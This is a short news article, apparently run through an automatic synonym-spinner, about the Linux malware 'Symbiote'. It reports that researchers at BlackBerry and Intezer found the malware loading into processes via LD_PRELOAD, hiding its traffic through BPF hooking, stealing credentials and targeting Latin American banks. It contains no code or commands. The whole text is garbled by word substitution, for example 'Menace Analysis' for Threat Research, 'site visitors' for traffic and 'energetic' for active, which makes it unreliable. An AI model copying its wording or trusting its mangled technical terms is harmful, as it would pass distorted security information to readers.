Researchers have discovered a brand new malware concentrating on Linux methods with a parasitic impact. Recognized as “Symbiote,” this new malware infects Linux processes to supply rootkit performance to the attackers.
About Symbiote Linux Malware
Following a joint evaluation of their researchers, the BlackBerry Menace Analysis & Intelligence crew and Intezer have shared insights in regards to the newly found Linux malware. The researchers have named this malware “Symbiote” because it displays a symbiotic (slightly parasitic) habits on Linux methods.
Briefly, the malware, not like different malware that aggressively kill system processes, Symbiote masses on all processes as a shared object (SO) library. On this approach, it makes use of these processes to inflict injury. As soon as finished, the malware then steals credentials from the system. Additionally, it provides distant entry to the attackers.
Apart from, it additionally displays large sneakiness by utilizing Berkeley Packet Filter (BPF) hooking performance to cover malicious community site visitors.
When an administrator begins any packet seize software on the contaminated machine, BPF bytecode is injected into the kernel that defines which packets must be captured. On this course of, Symbiote provides its bytecode first so it might filter out community site visitors that it doesn’t need the packet-capturing software program to see.
Furthermore, the malware additionally exploits the LD_PRELOAD directive to load earlier than different shared objects. That’s how the malware hijacks different library imports and evades detection. The next chart illustrates the evasion strategies that Symbiote applies throughout infections.
Whereas the researchers have not too long ago shared malware particulars, it isn’t totally new. As a substitute, the malware has been energetic within the wild, with its first samples courting again to November 2021. In response to the researchers, the menace actors used this malware to focus on monetary establishments in Latin America.
The researchers discovered its code doesn’t resemble any recognized Linux malware varieties, confirming that it’s totally new malware. Nevertheless, it does exhibit slight similarities with the 2014-discovered Ebury malware, which additionally serves as a backdoor for the attackers and credential harvester.
Tell us your ideas within the feedback.